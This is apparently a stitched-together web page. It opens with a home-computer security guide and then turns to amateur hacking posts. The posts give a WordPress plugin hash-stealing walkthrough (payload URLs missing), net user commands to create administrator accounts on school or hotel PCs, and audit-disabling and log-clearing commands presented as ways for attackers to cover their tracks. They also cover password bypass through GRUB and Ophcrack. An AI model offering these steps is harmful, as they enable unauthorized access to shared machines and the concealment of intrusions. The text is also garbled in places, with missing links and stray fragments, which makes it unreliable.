As you computerize the routine aspects of your daily life, making backup copies of important files and folders becomes critical. Even if you can’t store the backup copies in a fireproof container or somewhere outside your home, make backups anyway. Any backup is better than none.

Use a worksheet to record your important information about backups.

Task 6 - Use Strong Passwords
Your living space has doors and windows, and perhaps most of the time they’re locked. For each lock that uses a key, chances are that each key is different. You know to lock up and not to share the keys with strangers, and probably not with most of your friends. You should not hide keys under the mat or in a flowerpot on your front porch.

Passwords for computers are much the same. For each computer and service you use (online purchasing, for example), you should have a password. Each password should be unique and unrelated to any of your other passwords. You shouldn’t write them down nor should you share them with anyone, even your best friends.

Take a look at your front door key. It’s pretty complicated. There are lots of notches and grooves. If there weren’t so many possible variations, a thief could easily make a key for every possible combination and then try each on your front door. This trial-and-error method, (for computers, called brute force) is likely to be effective even if it takes a long time. Nonetheless, no matter how complicated, if the thief gets hold of your key, he or she can copy it and use that copy to open your door.

A password can also be complicated. Most schemes let you use any combination of letters, both upper and lower case, and numbers; and some also let you use punctuation marks. Lengths can vary. You can create a password to be as complicated as you want. The key (no pun intended) is to be able to remember this password whenever you need it without having to write it down to jog your memory.

Like the thief at your door, computer intruders also use trial-and-error, or brute-force techniques, to discover passwords. By bombarding a login scheme with all the words in a dictionary, they may “discover” the password that unlocks it. If they know something about you, such as your spouse’s name, the kind of car you drive, or your interests, clever intruders can narrow the range of possible passwords and try those first. They are often successful. Even slight variations, such as adding a digit onto the end of a word or replacing the letter o (oh) with the digit 0 (zero), don’t protect passwords. Intruders know we use tricks like this to make our passwords more difficult to guess.

Just like the front door key, even a complicated password can be copied and the copy reused. Remember the earlier discussion about information on the Internet being in the clear? Suppose that really strong password you took a long time to create – the one that’s 14 characters long and contains 6 letters, 4 numbers, and 4 punctuation marks, all in random order – goes across the Internet in the clear. An intruder may be able to see it, save it, and use it. This is called sniffing and it is a common intruder practice.

The point is that you need to follow the practice of using a unique password with every account you have. Below is a set of steps that you can use to help you create passwords for your accounts:

The Strong test: Is the password as strong (meaning length and content) as the rules allow?
The Unique test: Is the password unique and unrelated to any of your other passwords?
The Practical test: Can you remember it without having to write it down?
The Recent test: Have you changed it recently?
In spite of the SUPR tests, you need to be aware that sniffing happens, and even the best of passwords can be captured and used by an intruder.

You should use passwords not only on your home computer but also for services you use elsewhere on the Internet. All should have the strongest passwords you can use and remember, and each password should be unique and unrelated to all other passwords. A strong password is a password that is longer than it is short, that uses combinations of uppercase and lowercase letters, numbers, and punctuation, and that is usually not a word found in a dictionary. Also remember that no matter how strong a password is, it can still be captured if an intruder can see it “in the clear” somewhere on the Internet. (See the Information in the Clear section.)

Use a worksheet to help you manage your passwords.

Task 7 - Use Care When Downloading and Installing Programs
When you buy an appliance, you give little thought to it doing you or your house any harm. Why? Because there are organizations like Underwriters Laboratories that set standards and certify products. When you see a certifier’s label, you have more confidence that a product will be safer than a competing product that does not carry the same label. You’re willing to accept the risk because you believe the product has met some standards and has been certified by a respected authority.

Unfortunately, the Internet is not the same. There are neither standards nor many certification organizations. Anyone who writes a program can distribute it through any means available, such as through the web or by sending you a copy. Speaking of that, have you ever received a CD-ROM in the mail? How do you know that it contains what the label says? The answer is: you don’t know. More importantly, it’s difficult to know.

No matter how you acquire a program, it runs on your computer at the mercy of the program’s author. Anything, any operation, any task that you can do, this program can also do. If you’re allowed to remove any file, the program can too. If you can send email, the program can too. If you can install or remove a program, the program can too. Anything you can do, the intruder can do also, through the program you’ve just installed and run.

Sometimes there’s no explanation of what a program is supposed to do or what it actually does. There may be no user’s guide. There may be no way to contact the author. You’re on your own, trying to weigh a program’s benefits against the risk of the harm that it might cause.

What’s the problem you’re trying to solve here? You are trying to determine if the program you’ve just found satisfies your needs (say it provides a service that you want or you’re just experimenting) without causing harm to your computer and ultimately the information you have on the computer. How do you decide if a program is what it says it is? How do you gauge the risk to you and your computer by running this program?

You address these same risk issues when you purchase an appliance; you may just not have realized that’s what you were doing. When you make that purchase, you buy from either a local store you know or a national chain with an established reputation. If there’s a problem with your purchase, you can take it back to the store and exchange it or get your money back. If it causes you harm, you can seek relief through the legal system. The reputation of the merchant, the refund/return policy, and the availability of the legal system reduce your risk to a point where you make the purchase.

Apply these same practices when you buy a program. You should

Learn as much as you can about the product and what it does before you purchase it.
Understand the refund/return policy before you make your purchase.
Buy from a local store that you already know or a national chain with an established reputation.
Presently, it is not as clear what the legal system’s role is for a program that causes harm or does not work as advertised. In the meantime, the LUB practices are a good first step.

Today’s Internet has a feature that standard products don’t have, or at least have but to a lesser extent. This feature is free programs. There is a multitude of free programs available for all types of systems, with more available each day. The challenge is to decide which programs deserve your confidence and are, therefore, worth the risk of installing and running on your home computer.

So then, how do you decide if a program is worth it? To decide if you should install and run a program on your home computer, follow these steps:

The Do test: What does the program do? You should be able to read a clear description of what the program does. This description could be on the web site where you can download it or on the CD-ROM you use to install it. You need to realize that that if the program was written with malicious intent, the author/intruder isn’t going to tell you that the program will harm your system. They will probably try to mislead you. So, learn what you can, but consider the source and consider whether you can trust that information.
The Changes test: What files are installed and what other changes are made on your system when you install and run the program? Again, to do this test, you may have to ask the author/intruder how their program changes your system. Consider the source.
The Author test: Who is the author? (Can you use email, telephone, letter, or some other means to contact them?) Once you get this information, use it to try to contact them to verify that the contact information works. Your interactions with them may give you more clues about the program and its potential effects on your computer and you.
The Learn test: Has anybody else used this program, and what can you learn from him or her? Try some Internet searches using your web browser. Somebody has probably used this program before you, so learn what you can before you install it.
If you can’t determine these things – the DCAL tests for short – about the program you’d like to install, then strongly consider whether it’s worth the risk. Only you can decide what’s best. Whatever you do, be prepared to rebuild your computer from scratch in case the program goes awry and destroys it. Task 5 - Make Backups of Important Files and Folders tells you how to make a copy of your important information should you need it.

Your anti-virus program prevents some of the problems caused by downloading and installing programs. However, you need to remember that there’s a lag between recognizing a virus and when your computer also knows about it. Even if that nifty program you’ve just downloaded doesn’t contain a virus, it may behave in an unexpected way. You should continue to exercise care and do your homework when downloading, installing, and running new programs.

Use a worksheet to record important information about programs you install on your computer.

Task 8 - Install and Use a Hardware Firewall
Complement your firewall program by installing a hardware firewall. Together, these two firewalls stand between your home computer and the Internet. This is another place where your money is well spent.

Please go to Task 4 - Install and Use a Firewall Program to learn more about firewalls. That section concentrates primarily on firewall programs, but much of the information applies to hardware firewalls as well. To find out what hardware firewall products are available, search the Internet with your web browser.

Use a worksheet to record the ruleset for your hardware firewall.

Task 9 - Install and Use a File Encryption Program and Access Controls
Let’s return to your living space and our original analogy. Think about your checkbook, your insurance policies, perhaps your birth certificate or passport, and other important documents you have at home. Where are they? They’re probably stored in a filing cabinet or a safe, either of which that can be or is routinely locked. Why do you store these important items in a locked container?

Without realizing it, you are satisfying one of the three components of information security – confidentiality. Confidentiality means keeping secrets secret. Only those who are supposed to see that information should have access to it. You are keeping information sensitive to you and others away from those who should not be able to get to it, for example a family member or an intruder. By the way, the other two components of information security are integrity (Has my information changed?) and availability (Can I get to my information whenever I need it?).

You further protect information confidentiality when you enforce it by using an access control device, namely the lock on your filing cabinet or safe. This device stands between the information and those seeking access, and it grants access to all who have the combination, the key, or whatever tool unlocks the container. When several layers of access control devices are used (called “defense in depth”) – you might also find that these containers are themselves in locked rooms. Would-be intruders must pass through several levels of protection before finally gaining access to the information they seek.

Now, think back to your home computer. The problem is to control access to files and folders. The access control device here is the access control list or ACL. ACLs define who can perform actions on a file or folder: reading and writing, for example. ACLs are equivalent to a locked filing cabinet for paper documents.

Different computer systems provide different types of ACLs. Some have fine-grained controls while others have virtually none. The key is to use all the controls that are available on your computer.

Frequently, vendors define ACLs that are overly permissive. This satisfies their need to ensure that access limitations don’t get in the way of using their systems. Your challenge is to tighten those ACLs so that they properly restrict access to only those who need access. This means that you need to modify the ACLs from the settings set by the vendor. We’ll talk more about how to do this shortly.

Returning to the home environment, do you remember a time when adults in your house wanted to say something to one another in front of their children but in such a way that the children couldn’t understand what was being said? Perhaps they spelled their message or used Pig Latin (ig-pay Atin-lay) to conceal the meaning. This worked for a while, until the children learned to spell or could otherwise understand what was being said. What’s really happening here?

Very simply, the adults could not control who could hear their conversation. It was inconvenient or perhaps impossible for them to go to another room where they couldn’t be heard. They had to talk in a way that only those who knew the concealing scheme could understand what was being said.

On a computer, when access to information can’t be limited, such for an e-commerce transaction over the Internet, that information is concealed through a mathematical process called encryption. Encryption transforms information from one form (readable text) to another (encrypted text). Its intent is to hide information from those who have neither the transformation method nor the particulars (the decryption keys) to transform the encrypted text into readable text. The encrypted text appears to be gibberish and remains so for people who don’t have the scheme and the keys.

Back on the home front, the children eventually learned how to spell and perhaps also learned the trick to using Pig Latin. They can now understand the conversations the adults are having. While they could also understand the conversations held weeks, months, or even years before, the information in those conversations is no longer important. The encryption scheme – spelling or Pig Latin – is strong enough to guard the information during its useful lifetime.

Computer-based encryption schemes must also withstand the test of time. For example, if a credit card encryption scheme needs six months of computer time to break, the resulting clear text credit card number is probably still valid and, therefore, useful to an intruder. In this case, the encryption scheme isn’t strong enough to guard the information for its entire useful lifetime.

So, to guard paper or computer files, you need to limit who has access to them by using the access control devices, whether filing cabinets and safes for paper or access control lists for information on a computer system. For assets whose access cannot be sufficiently limited, you need to encrypt them strongly enough so that the time it takes to decrypt them is longer than their useful life.

Now, what can you do?

First, if more than one person uses your computer, you can adjust the ACLs that control access to sensitive files and folders. Your goal is to allow the correct type of access to the files and folders that each user needs, and nothing more. The steps below help you to decide how to adjust the ACLs for files and folders:

The Who test: Who – which users – need access to files besides you?
The Access test: What type of access do they need? Read? Write?
The Files/Folders test: Which files and folders need special access? Just like your firewall rules, your general policy should be to limit access to only you first, and then grant access beyond that where needed.
By applying the WAF tests, you can limit access to sensitive files on your computer to only those who need it.

Setting proper ACLs is not a trivial task. Be prepared to repeat it a few times until you get it right for the way your computer is used. It’s worth the time spent, but know that it may take longer than you expect.

For very sensitive files and for files that are on a laptop, don’t rely solely on file and folder ACLs. You need to go further and use encryption.

Some vendors provide encryption with their systems right from the start. This means that all you have to do is follow the vendor’s instructions on how to use those features, but be certain to use them.

On systems where encryption is not included, you need to install additional encryption programs. For encryption programs that you download from the Internet, be sure to follow the instructions in Task 7 - Use Care When Downloading and Installing Programs. Also follow the instructions in Task 6 - Use Strong Passwords for additional guidance on passwords required by encryption programs.

There are free and commercial encryption programs, and in most cases, the free versions suffice. However, commercial programs may provide more features and may keep up better with newer and, therefore, stronger encryption methods. If you rely on a laptop computer, you should consider purchasing a commercial file encryption programs.

Whether paper files around your living space or files and folders on your computer, limit access where you can. On your computer, use encryption programs either when you can’t restrict access to the extent that you’d like or when you want even more security protecting your computer files and folders.

Use a worksheet to record information about the files you encrypt and the access controls you set.
Example: Adjusting Access Control Lists.

Growing up, you learn many of the things you need to know about how to operate and care for a car by sitting in the back seat while adults drive and care for their vehicles. Similarly, you learn many of the things you need to know about how to care for and maintain a home by watching what is done to the one where you live. It is a slow, gradual process, so slow in fact you are probably unaware that you are learning the skills you need to do these same jobs yourself.

You don’t have that same luxury of time to learn how to care for and operate your home computer. When you attach it to the Internet for the first time, it instantly becomes a target for intruders. You need to be ready right from the start.

As you grow up, you also learn that you need to spend time and money to repair and replace those things around your living space and your car that need your attention. You learn that you have to spend more time and more money to tailor them to meet your needs and to keep you and others safe during their use. You accept these responsibilities and their costs as part of the total cost of ownership of that car and living space.

Your home computer is much the same. There is the initial money that you pay to purchase that system. Then there are additional costs to tailor it and to keep you and the others who use your system safe. These additional costs are also your responsibility, and they are part of the total cost of ownership of your home computer.

This document helps you think about the problems you face when you have a home computer and gives you advice on how to address these problems. By taking the time to read this document, you know more about securing your home computer and the extra costs required to do this job. Do the tasks described here and share this document with your friends. We all benefit from a more secure Internet..


Wordpress Hacking

How to hack a wordpress based website

ok first use this dork to search a victim

then you take on site of your results
you should get a user info page

your link should be something like this now

now replace "?fbconnect_action=myhome&userid="

with this

your url should be something like this now

now you will get username and the passwort decrypted in a hash. You can crack the hash with Passwordspro.

search admin login and your finish

Get Admin Rights

How to get a admin account on a school pc or a pc in a hotel which you can rent to get connection to the internet.
1) On most of this Pc you cant use cmd because its disabled thats why we have to get it. Open notepad and write this into it:
// save it with the name cmd.bat

2) Now we have to create our account :
write in cmd :
net user Admin2 /add
3) ok now we have our account now we have to give him admin rights
write this into cmd :
net localgroup Administratoren Admin2 /add
4) Ok now you have your Admin user account. Now you have to opportunities.
First : You can save the acc with a password. You only need to type this text into cmd:
net user Admin2*
Second : You can delete your account write this:
net user Admin2 /del

To write messages between differt users you only need to write in cmd :
msg OtherUser *
Then you get a textfield where you can write your message into.
If your finish with your text write "^Z" and press enter


Firefox Increase Speed

hi guys to increase firefox speed you only need to write "about:config" in the url line of mozialla firefox and change this settings.
I know its a old trick but its working

1. network.http.max-connections-per-server =32

2. network.http.max-persistent-connections-per-proxy =16

3. network.http.max-connections = 64

4. network.http.max-persistent-connections-per-server = 10

5. network.http.pipelining = true

6. network.http.pipelining.maxrequests = 200

7. network.http.request.max-start-delay = 0

8. network.http.proxy.pipelining = true

9. network.http.proxy.version = 1.0

then close firefox and start it new. you will see the result

Security Tips

its good to know how to hack some website or somebody else pc but its more important to know how to save his own pc. I can give you a example last week i hacked somebodys website but i wasn't enogh careful and he got my Ip. The result of this was that he hacked my pc. Ok it wasnt a good hacker he only chanched my admin password and the bios password. I had luck but if it had been a better one he he sure had done more harm. the moral of this history is save your pc
ok here some programms which help you to save your pc:
this programms are on my Windows XP pc. I dont know how good they are on a linux pc or some other operating system.
1) Malewarebytes Anti Maleware : Its a great Scanner.
download :
2) CCcleaner : A scanner too but its faster.
download :
3) AVG Anitvirus : Antivirus programm
4) Defraggler download : scanner
5) Folder Acces : to save some files with a password
download :
6) No Virus : you can scan websites and online files with it

I hope i could help you with this post to save your pc


How hackers can erase their tracks after hacking..

Whenever someone comes in contact with another person, place, or thing, something of that person is left behind. This means that the attacker must disable logging, clear log files, eliminate evidence, plant additional tools, and cover his tracks.

Here are some of the techniques that an attacker can use to cover his tracks:-
(1) Disabling logging – Auditpol was originally included in the NT Resource kit for administrators. It works well for hackers too, as long as they have administrative access.
Just point it at the victim’s system as follows:
C:\>auditpol \\192.168.10 /disable
Auditing Disabled

(2) Clear the log file – The attacker will also attempt to clear the log. Tools, such as Winzapper, evidence Eliminator, or Elsave, can be used. Elsave will remove all entries from the logs, except one entry that shows the logs were cleared.
It is used as follows:

Elsave -s \\ -1 “Security” -C

(3) Cover their tracks – One way for attackers to cover their tracks is with rootkits. Rootkits are malicious codes designed to allow an attacker to get expanded access and hide his presence. While rootkits were traditionally a Linux tool, they are now starting to make their way into the Windows environment. Tools, such as NTrootkit and AFX Windows rootkits, are available for Windows systems. If you suspect that a computer has been rootkitted, you need to use an MD5 checksum utility or a program, such as Tripwire, to determine the viability of your programs. The only other alternative is to rebuild the computer from known good media.

Forgot your own pass ? Linux Ubuntu , Windows XP, Vista , 7

Somethims it happens that i forget my password.. what to do ??? here i will show you two ways for different OS (linux Ubuntu
and Windows XP )
1. Reboot your computer and when you see GRUB Loading Screen press ESC so you come into the menu.
2. Now choose recovery mode
3. Chosse root shell prompt
4. now the system will show you cmd
to reset your pass use "passwd
5. if you are finish with that reboot your system
command : reboot-f

2 ) linux
1) choose the regular boot
2) use "e" to edit the settings
3) now hit the arrow key down over options and then use "e" to change to the edit mode
4) ok now you will get a scree with "single"
5) remove single with delete key and add this : rw init=/bin/bash
6) ok use "B" to boot with this settings
7) and now you get cmd and you can use the things I told you with the other method

3) Windows versions
Its always the same way you only need to download the right Ophcrack version for you operating system.
1. download ImgBurn here
2. Download Ophcrack : XP Windows Vista, 7
3) now burn Ophcrack with ImgBurn on a dvd
4) start your pc and do the dvd into it
5) open bios and choose boot from dvd
6) it will take 5 minutes but then you will get all Users from this pc and their passwords


What Are Public And Private IP Address...

What Are Public And Private IP Address...
Internet Protocol (IP) addresses are usually of two types: Public and Private. If you have ever wondered to know what is the difference between a public and a private IP address, then you are at the right place. In this post I will try to explain the difference between a public and a private IP addres in layman’s terms so that it becomes simple and easy to understand.

What are Public IP Addresses?
A public IP address is assigned to every computer that connects to the Internet where each IP is unique. Hence there cannot exist two computers with the same public IP address all over the Internet. This addressing scheme makes it possible for the computers to “find each other” online and exchange information. User has no control over the IP address (public) that is assigned to the computer. The public IP address is assigned to the computer by the Internet Service Provider as soon as the computer is connected to the Internet gateway.

A public IP address can be either static or dynamic. A static public IP address does not change and is used primarily for hosting webpages or services on the Internet. On the other hand a dynamic public IP address is chosen from a pool of available addresses and changes each time one connects to the Internet. Most Internet users will only have a dynamic IP assigned to their computer which goes off when the computer is disconnected from the Internet. Thus when it is re-connected it gets a new IP.

You can check your public IP address by visiting

What are Private IP Addresses?
An IP address is considered private if the IP number falls within one of the IP address ranges reserved for private networks such as a Local Area Network (LAN). The Internet Assigned Numbers Authority (IANA) has reserved the following three blocks of the IP address space for private networks (local networks):
--------------------------------------------------------------------- – (Total Addresses: 16,777,216) – (Total Addresses: 1,048,576) – (Total Addresses: 65,536)
Private IP addresses are used for numbering the computers in a private network including home, school and business LANs in airports and hotels which makes it possible for the computers in the network to communicate with each other. Say for example, if a network X consists of 10 computers each of them can be given an IP starting from to Unlike the public IP, the administrator of the private network is free to assign an IP address of his own choice (provided the IP number falls in the private IP address range as mentioned above).

Devices with private IP addresses cannot connect directly to the Internet. Likewise, computers outside the local network cannot connect directly to a device with a private IP. It is possible to interconnect two private networks with the help of a router or a similar device that supports Network Address Translation.

If the private network is connected to the Internet (through an Internet connection via ISP) then each computer will have a private IP as well as a public IP. Private IP is used for communication within the network where as the public IP is used for communication over the Internet. Most Internet users with a DSL/ADSL connection will have both a private as well as a public IP.

You can know your private IP by typing ipconfig command in the command prompt. The number that you see against “IPV4 Address:” is your private IP which in most cases will be or Unlike the public IP, private IP addresses are always static in nature.

Unlike what most people assume, a private IP is neither the one which is impossible to trace (just like the private telephone number) nor the one reserved for stealth Internet usage. In reality there is no public IP address that is impossible to trace since the protocol itself is designed for transparency.

Computer Acronyms


computer Acronyms
ADSL - Asymmetric Digital Subscriber Line
AGP - Accelerated Graphics Port
ALI - Acer Labs, Incorporated
ALU - Arithmetic Logic Unit
AMD - Advanced Micro Devices
APC - American Power Conversion
ASCII - American Standard Code for Information Interchange
ASIC - Application Specific Integrated Circuit
ASPI - Advanced SCSI Programming Interface
AT - Advanced Technology
ATI - ATI Technologies Inc.
ATX - Advanced Technology Extended

--- B ---
BFG - BFG Technologies
BIOS - Basic Input Output System
BNC - Barrel Nut Connector

--- C ---
CAS - Column Address Signal
CD - Compact Disk
CDR - Compact Disk Recorder
CDRW - Compact Disk Re-Writer
CD-ROM - Compact Disk - Read Only Memory
CFM - Cubic Feet per Minute (ft�/min)
CMOS - Complementary Metal Oxide Semiconductor
CPU - Central Processing Unit
CTX - CTX Technology Corporation (Commited to Excellence)

--- D ---

DDR - Double Data Rate
DDR-SDRAM - Double Data Rate - Synchronous Dynamic Random Access Memory
DFI - DFI Inc. (Design for Innovation)
DIMM - Dual Inline Memory Module
DRAM - Dynamic Random Access Memory
DPI - Dots Per Inch
DVD - Digital Versatile Disc
DVD-RAM - Digital Versatile Disk - Random Access Memory

--- E ---
ECC - Error Correction Code
ECS - Elitegroup Computer Systems
EDO - Extended Data Out
EEPROM - Electrically Erasable Programmable Read-Only Memory
EPROM - Erasable Programmable Read-Only Memory
EVGA - EVGA Corporation

--- F ---
FC-PGA - Flip Chip Pin Grid Array
FDC - Floppy Disk Controller
FDD - Floppy Disk Drive
FPS - Frame Per Second
FPU - Floating Point Unit
FSAA - Full Screen Anti-Aliasing
FS - For Sale
FSB - Front Side Bus

--- G ---
GB - Gigabytes
GBps - Gigabytes per second or Gigabits per second
GDI - Graphical Device Interface
GHz - GigaHertz

--- H ---
HDD - Hard Disk Drive
HIS - Hightech Information System Limited
HP - Hewlett-Packard Development Company
HSF - Heatsink-Fan

--- I ---
IBM - International Business Machines Corporation
IC - Integrated Circuit
IDE - Integrated Drive Electronics
IFS- Item for Sale
IRQ - Interrupt Request
ISA - Industry Standard Architecture
ISO - International Standards Organization

--- J ---
JBL - JBL (Jame B. Lansing) Speakers
JVC - JVC Company of America

- K ---
Kbps - Kilobits Per Second
KBps - KiloBytes per second

--- L ---
LG - LG Electronics
LAN - Local Are Network
LCD - Liquid Crystal Display
LDT - Lightning Data Transport
LED - Light Emitting Diode

--- M ---
MAC - Media Access Control
MB � MotherBoard or Megabyte
MBps - Megabytes Per Second
Mbps - Megabits Per Second or Megabits Per Second
MHz - MegaHertz
MIPS - Million Instructions Per Second
MMX - Multi-Media Extensions
MSI - Micro Star International

--- N ---
NAS - Network Attached Storage
NAT - Network Address Translation
NEC - NEC Corporation
NIC - Network Interface Card

--- O ---
OC - Overclock (Over Clock)
OCZ - OCZ Technology
OEM - Original Equipment Manufacturer

--- P ---
PC - Personal Computer
PCB - Printed Circuit Board
PCI - Peripheral Component Interconnect
PDA - Personal Digital Assistant
PCMCIA - Peripheral Component Microchannel Interconnect Architecture
PGA - Professional Graphics Array
PLD - Programmable Logic Device
PM - Private Message / Private Messaging
PnP - Plug 'n Play
PNY - PNY Technology
POST - Power On Self Test
PPPoA - Point-to-Point Protocol over ATM
PPPoE - Point-to-Point Protocol over Ethernet
PQI - PQI Corporation
PSU - Power Supply Unit

--- R ---
RAID - Redundant Array of Inexpensive Disks
RAM - Random Access Memory
RAMDAC - Random Access Memory Digital Analog Convertor
RDRAM - Rambus Dynamic Random Access Memory
ROM - Read Only Memory
RPM - Revolutions Per Minute

--- S ---
SASID - Self-scanned Amorphous Silicon Integrated Display
SCA - SCSI Configured Automatically
SCSI - Small Computer System Interface
SDRAM - Synchronous Dynamic Random Access Memory
SECC - Single Edge Contact Connector
SODIMM - Small Outline Dual Inline Memory Module
SPARC - Scalable Processor ArChitecture
SOHO - Small Office Home Office
SRAM - Static Random Access Memory
SSE - Streaming SIMD Extensions
SVGA - Super Video Graphics Array
S/PDIF - Sony/Philips Digital Interface

--- T ---
TB - Terabytes
TBps - Terabytes per second
Tbps - Terabits per second
TDK - TDK Electronics
TEC - Thermoelectric Cooler
TPC - TipidPC
TWAIN - Technology Without An Important Name

--- U ---
UART - Universal Asynchronous Receiver/Transmitter
USB - Universal Serial Bus
UTP - Unshieled Twisted Pair

--- V ---
VCD - Video CD
VPN - Virtual Private Network

--- W ---
WAN - Wide Area Network
WTB - Want to Buy
WYSIWYG - What You See Is What You Get

--- X ---
XGA - Extended Graphics Array
XFX - XFX Graphics, a Division of Pine
XMS - Extended Memory Specification
XT - Extended Technology


What is A Hacker?

A hacker is known to build things, solve problems and not break or crack any system. The computer industry initially hired good programmers to make sure how to full proof their system. However, over the years, the media, journalism and writers have played a very important role in changing the real meaning of the word hacker. They themselves are very confused in the term Hacker and a Cracker. A typical definition of a Hacker, that today comes to you mind is that a Hacker, is a person who tries to gain unauthorized access to any property and computers. The term Hacker came as slang from the computer world. So, different people have given different definitions to it. But what remains the common point is, that whenever you hear the word hacker, the first think that comes to your mind is always negative and bad. However, the real meaning of a hacker is a programmer who really finds it thrilling to learn more about it, who likes to explore more details about the programming language and hence stretches his or her capabilities more than any average person.

Crackers are people who get cheap thrill out of cracking computer codes, and breaking into systems. Hence, these are the people who have negativity around them and they only believe in breaking or cracking an access to any kind of system that they have no authorization to. They are malicious annoying people who try to uncover sensitive information by poking their unwanted nose everywhere. Hackers on the other hand are knowledgeable and responsible people. They like to take intellectual challenges and like to overcome all limitations that are there in a particular system. Learning to hack is not very easy. It is a special gift that is only given to a selected few. Only people who are good in searching and keeping themselves updated about the latest technology are the one who are blessed with it. Only being good with computers does not qualify one to be a good hacker. Some people also reapply their hacking knowledge to different fields like music and electronic. It is also said the every hacker is independent of any kind of hack he does, call it in the computer field or elsewhere. Hackers are known to be ethical, wise in their practice.

The realty is: 'Hackers build things, crackers break them.'

Today the hacker world has been given 3 different names. The White hat hackers, who do all the good things and are positively motivated people, Then we have the Black hat hackers also called the crackers who are usually into negative work of cracking and breaking into someone's system and finally the third and the last are the grey hat hackers who explore the best of both the worlds. To conclude, we can say that Hackers are people who are skilled programmers that work for a positive cause or a goal, either for themselves or for an organization which could be private as in an industry or for the government.

›Thinking of A Hacker

The thinking of a hacker is very much the same as that of a good program developer. Hackers who have been successful have developed a common strategy over a period of time. This strategy is to very patiently and carefully document every step, which is what the programmers do. They are good at analyzing and following a methodical approach of investigation. So when they start they don't have much as in the background, they start from the starch and gradually build what is called the entire roadmap or game plan.
It is a known fact that in order to think like a master hacker one should imitated all the big hackers both intellectually and emotionally. As they always work on a different platform and it is the platform of Self Belief.

1. The typical thinking of a Hacker is that, they believe that the world is full of ongoing problems which continuously need solutions to it. So looking for solutions should be the ultimate aim and not giving up till the time the problem is cracked.

2. Another fundamental that they work on is that, the same wheel should not be invented twice as it will be a waste of time and effort both. Brains with creativity should be used for new proposes and not older ones. So, they believe in the theory that time is precious and make the best out of it.

3. The third fundamental truth that they believe in is that, repetition is what leads to success and no word like boredom can be found in their dictionary.

4. The next good thing they believe in is Freedom. Most of the hackers work independently and that is a strong foundation for them to grow. It is said that freedom has no limit to the growth of an individual.

5. No replacement for a good attitude. An attitude to fight and not flight. One can give up whenever he or she wants. It is only the attitude that makes you different from the other.

6. Hackers believe in a value system that is not negotiable and do not compromise on it, because if they do then they would be crackers and not hackers.

Documentation is said to be the wisest thing that any developer a simple programmer or a hacker maintains. At times finding solutions is so difficult that is only the documentation that can help one understand the entire process all over again. It is like hunting for a treasure hunt in a jungle with small clues that take you to the next clue and one step closer to the final gift.
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